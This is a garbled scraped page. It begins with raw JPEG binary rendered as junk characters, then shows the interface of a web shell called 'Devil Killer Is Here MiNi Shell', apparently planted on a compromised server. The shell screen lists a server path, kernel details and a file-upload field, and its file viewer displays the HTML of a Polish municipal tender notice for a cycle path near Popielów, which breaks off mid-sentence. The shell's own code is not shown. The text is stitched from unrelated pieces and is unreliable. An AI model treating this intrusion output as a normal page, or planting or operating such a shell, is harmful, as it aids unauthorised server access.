JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250428/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250428/0020867501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ścieżki pieszo-rowerowej wzdłuż drogi powiatowej na odcinku od miejscowości Popielów do miejscowości Karłowice, w ramach projektu „Bezpieczny transport w Aglomeracji Opolskiej” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA POPIELÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413225</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Opolska 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Popielów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-090</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@popielow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.popielow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ścieżki pieszo-rowerowej wzdłuż drogi powiatowej na odcinku od miejscowości Popielów do miejscowości Karłowice, w ramach projektu „Bezpieczny transport w Aglomeracji Opolskiej” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-082c274c-faed-4eef-a723-a37534264d38</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00208675</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00038154/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa ścieżki pieszo-rowerowej wzdłuż drogi powiatowej na odcinku od miejscowości Popielów do miejscowości Karłowice, w ramach projektu „Bezpieczny transport w Aglomeracji Opolskiej”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Możliwe uzyskanie współfinansowania ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Funduszy Europejskich dla Opolskiego 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/popielow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/popielow Zamawiający dopuszcza komunikację za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osób uprawnionych do kontaktu z Wykonawcami: przetargi@popielow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.1.7. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na www.platformazakupowa.pl tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) szyfrowanie na www.platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>11.1.8. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z www.platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej<br/>pod linkiem https://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view.<br/>11.1.9. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>www.platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu<br/>składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”).<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym<br/>postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy Pzp.<br/>11.1.10. Zamawiający informuje, że instrukcje korzystania z www.platformazakupowa.pl dotyczące w szczególności logowania,<br/>składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu<br/>przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>11.1.11. Specyfikację warunków zamówienia udostępnia się na stronie internetowej Platformy zakupowej:<br/>https://platformazakupowa.pl/pn/popielow<br/>11.2.13. Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do “Rozporządzenia<br/>Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji<br/>w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych” z dnia 21 maja 2024 r. (Dz.U.2024.773 z<br/>dnia 2024.05.22), zwanego dalej Rozporządzeniem KRI.<br/>11.2.14. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg), ze szczególnym wskazaniem na<br/>.pdf<br/>11.2.15. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń:<br/>1) .zip<br/>2) .7Z<br/>11.2.16. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi<br/>maksymalnie 10 MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu<br/>osobistego, który wynosi maksymalnie 5 MB.<br/>11.2.17. W przypadku stosowania przez Wykonawcę kwalifikowanego podpisu elektronicznego:<br/>− (...)<br/>Z uwagi na ograniczoną liczbę znaków, pełen zakres informacji znajduje się w rozdziale 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">22.1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy w Popielowie z/s ul. Opolska 13, 46-090<br/>Popielów jest Wójt Gminy Popielów zwany dalej Administratorem Danych Osobowych (ADO).<br/>2) W urzędzie Gminy w Popielowie wyznaczony został Inspektor Ochrony Danych (IOD). Kontakt listowny z IOD: Urząd Gminy w<br/>Popielowie, ul. Opolska 13, 46-090 Popielów, kontakt e-mail: iod@popielow.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego.<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Prawo zamówień publicznych (Dalej: Pzp);<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy; albo 10 lat od czasu rozliczenia dofinansowania dla przedmiotowego przedmiotu zamówienia - w przypadku<br/>zamówień współfinansowanych ze środków UE chyba, że niezbędny będzie dłuższy okres przetwarzania, np. z uwagi na<br/>dochodzenie roszczeń lub inny obowiązek wymagany przez przepisy prawa powszechnie obowiązującego. Okresy te dotyczą<br/>również Wykonawców, którzy złożyli oferty i nie zostały one uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami<br/>umowy);<br/>6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>7) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>8) Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit.c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOS.271.6.2025.BK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Przedmiotem zamówienia są roboty budowlane związane z wykonaniem zadania w systemie „zaprojektuj i wybuduj: Budowa ścieżki pieszo-rowerowej wzdłuż drogi powiatowej na odcinku od miejscowości Popielów do miejscowości Karłowice, w ramach projektu „Bezpieczny transport w Aglomeracji Opolskiej”. Zakres przedmiotu zamówienia obejmuje w szczególności:<br/>1)	opracowanie dokumentacji projektowo – kosztorysowej niezbędnych branż wraz z uzyskaniem niezbędnych decyzji administracyjnych, opinii i pozwoleń umożliwiających realizację robót budowlanych, zgodnie z zakresem określonym w PFU, w tym:<br/>a)	opracowanie mapy do celów projektowych w skali wymaganej przez obowiązujące przepisy prawa (w niezbędnej ilości),<br/>b)	projekty podziału nieruchomości (7 egz. w wersji papierowej),<br/>c)	projekt tymczasowej organizacji ruchu wraz z jej zatwierdzeniem,<br/>d)	projekt stałej organizacji ruchu wraz z jej zatwierdzeniem,<br/>e)	opracowanie operatów wodnoprawnych wraz z uzyskaniem pozwoleń wodnoprawnych (jeżeli przepisy prawa tego wymagają), <br/>f)	wykonanie szczegółowej inwentaryzacji zieleni wraz z planem wyrębu (7 egz. w wersji papierowej),<br/>g)	wykonanie badań geotechnicznych podłoża gruntowego (w ilości niezbędnej do prawidłowego wykonania projektu budowlanego z elementami projektu wykonawczego),<br/>h)	projekt budowlany w zakresie niezbędnym do wydania decyzji pozwolenia na budowę/decyzji ZRID (7 egz. w wersji papierowej),<br/>i)	projekt wykonawczy/techniczny wszystkich branż (7 egz. w wersji papierowej),<br/>j)	specyfikacje techniczne wykonania i odbioru robót (STWiORB) (2 egz. w wersji papierowej),<br/>k)	przedmiar i kosztorys wszystkich branż (po 2 egz. w wersji papierowej),<br/>l)	opracowanie/uzyskanie dokumentacji, wniosków, operatów, pozwoleń, uzgodnień, opinii, sprawdzeń wynikających z przepisów, niezbędnych do uzyskania decyzji pozwolenia na budowę/decyzji ZRID oraz uprawniających do przystąpienia do realizacji robót budowlanych;<br/>m)	opracowanie dokumentacji zgodnie z Kryteriami Środowiskowymi dla wszystkich działań FEO 2021-2027, stanowiącymi załącznik do Regulaminu wyboru projektów obowiązującego w naborze 3.2 Mobilność miejska w ZIT, zamieszczonymi na stronie internetowej https://funduszeue.opolskie.pl/nabory/32-mobilnosc-miejska-w-zit <br/>n)	opracowanie dokumentacji projektowej i technicznej zgodnie z załączoną do PFU decyzją o środowiskowych uwarunkowaniach,<br/>o)	uzyskanie decyzji pozwolenia na budowę/decyzji ZRID,<br/>p)	sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego (BIOZ),<br/>q)	inne projekty, które podczas ustaleń z zamawiającym uznane zostaną za niezbędne do prawidłowego wykonania zadania lub wynikające z przepisów prawa (nie wykraczające poza zakres przedmiotu zamówienia),<br/>r)	kompletna dokumentacja w wersji elektronicznej edytowalnej .doc/.docx, .dwg/.dxf oraz .pdf, natomiast kosztorysy i przedmiary w wersji .pdf oraz .ath, a także skany niezbędnych opinii i uzgodnień w formacie .pdf na płycie CD lub nośniku pamięci USB (3 szt.);<br/>s)	pośredniczenie pomiędzy Zamawiającym a Zarządcą drogi w celu zapewnienia prawidłowej realizacji przedmiotu zamówienia, tj. w celu uzyskania prawomocnej decyzji pozwolenia na budowę/decyzji ZRID dla przedmiotowego przedsięwzięcia,<br/>t)	sprawowanie nadzoru autorskiego w rozumieniu art. 20 ust. 1 pkt 4) ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U.2024.725 t.j. z dnia 2024.05.14 ze zm.) w czasie robót budowlanych wykonywanych na podstawie opracowanej dokumentacji; nadzór autorski będzie obejmował w szczególności:<br/>	pobyt na budowie – do 10 razy,<br/>	pobyt w siedzibie Zamawiającego – do 10 razy,<br/>	prace w siedzibie nadzoru autorskiego,<br/>	opracowanie opinii – do 5 razy;<br/>u)	w ramach nadzoru autorskiego Wykonawca zobowiązany będzie m.in. do:<br/>	opiniowania zgodności wszystkich projektów wykonywanych przez Wykonawcę robót zadania inwestycyjnego w zakresie zgodności z wymaganiami dokumentacji projektowej, <br/>	wykonywania projektów zamiennych, <br/>	wyjaśniania wykonawcy prac objętych dokumentacją budowlaną wątpliwości powstałych w toku realizacji robót, <br/>	niezwłocznego wykonania poprawek i uzupełnień w dokumentacji projektowej;<br/>2)	dostawa i montaż tablic informacyjno-promocyjnych o wymiarach 120x60 cm – 2 szt. (po jednej na początku i na końcu inwestycji); wykonanie tablic oraz ich umieszczenie w miejscu realizacji projektu musi być zgodne z wytycznymi zamieszczonymi na stronie: https://funduszeue.opolskie.pl/komunikacja-i-promocja; Wykonawca zobowiązany jest do uzgodnienia z Zamawiającym projektu tablicy, przed zleceniem jej realizacji;<br/>	tablice powinny być jednostronne, na podkładzie metalowym z podwójnie zawiniętą krawędzią, o wskazanych powyżej wymiarach; każda tablica mocowana na dwóch słupkach ze stali ocynkowanej o wysokości ok 3,30 m i średnicy 50 mm umieszczonych w gruncie w obrębie realizowanej inwestycji;<br/>	tablice muszą być umiejscowione w docelowych miejscach w chwili rozpoczęcia robót budowlanych;<br/>3)	wykonanie robót budowlanych i instalacyjnych w oparciu o opracowaną dokumentację, m.in.:<br/>a)	wprowadzenie tymczasowej organizacji ruchu,<br/>b)	wycinka drzew i krzewów wraz z karczowaniem korzeni,<br/>c)	budowa przepustów,<br/>d)	budowa obiektów inżynierskich, w tym mostowych,<br/>e)	budowa ścieżki rowerowej i pieszo-rowerowej o nawierzchni bitumicznej o dł. ok 5,6 km, szer. ok 2,0 – 3,0 m,<br/>f)	budowa i przebudowa odwodnienia (rowy, kanalizacja deszczowa),<br/>g)	wykonanie skarp i poboczy,<br/>h)	wykonanie przejść/przejazdów pieszo-rowerowych,<br/>i)	przebudowa i rozbudowa skrzyżowania drogi powiatowej,<br/>j)	przebudowa części drogi powiatowej na odc. ok 180 m w miejscowości Karłowice,<br/>k)	budowa i przebudowa zjazdów,<br/>l)	likwidacja kolizji z istniejącą i projektowaną infrastrukturą techniczną,<br/>m)	budowa kanału technologicznego (jeżeli zajdzie taka konieczność),<br/>n)	wykonanie oświetlenia przejść/przejazdów,<br/>o)	montaż urządzeń bezpieczeństwa ruchu,<br/>p)	wprowadzenie docelowej stałej organizacji ruchu (oznakowanie poziome i pionowe),<br/>q)	wykonanie trwałej stabilizacji granic pasa drogowego zgodnie z decyzją o zezwoleniu na realizację inwestycji drogowej;<br/>4)	przygotowanie i przedłożenie kompletnej dokumentacji powykonawczej pozwalającej Zamawiającemu na zakończenie budowy/robót i/lub oddanie obiektu do użytku;<br/><br/>UWAGA:<br/>PFU zawiera informację, że jeżeli Wykonawca w trakcie opracowywania dokumentacji projektowej uzyska odstąpienie od konieczności zaprojektowania kanału technologicznego – nie będzie konieczności jego wykonywania w trakcie robót. Z uwagi na konieczność zachowania zasady konkurencyjności wszyscy Wykonawcy zobowiązani są uwzględnić przy obliczaniu ceny ofertowej konieczność zaprojektowania i wykonania kanału technologicznego. Złożone w ten sposób oferty będą porównywalne. Zgodnie z zapisami SWZ jeżeli faktycznie zajdzie możliwość niewykonywania kanału technologicznego, wówczas zgodnie z zapisami zawartej umowy zakres umowy zostanie zmniejszony, a tym wartość umowy również zostanie pomniejszona. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233162-2 - Roboty budowlane w zakresie ścieżek rowerowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">77211400-6 - Usługi wycinania drzew</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233121-3 - Roboty w zakresie budowy dróg głównych</p> <p class="mb-0">45221000-2 - Roboty budowlane w 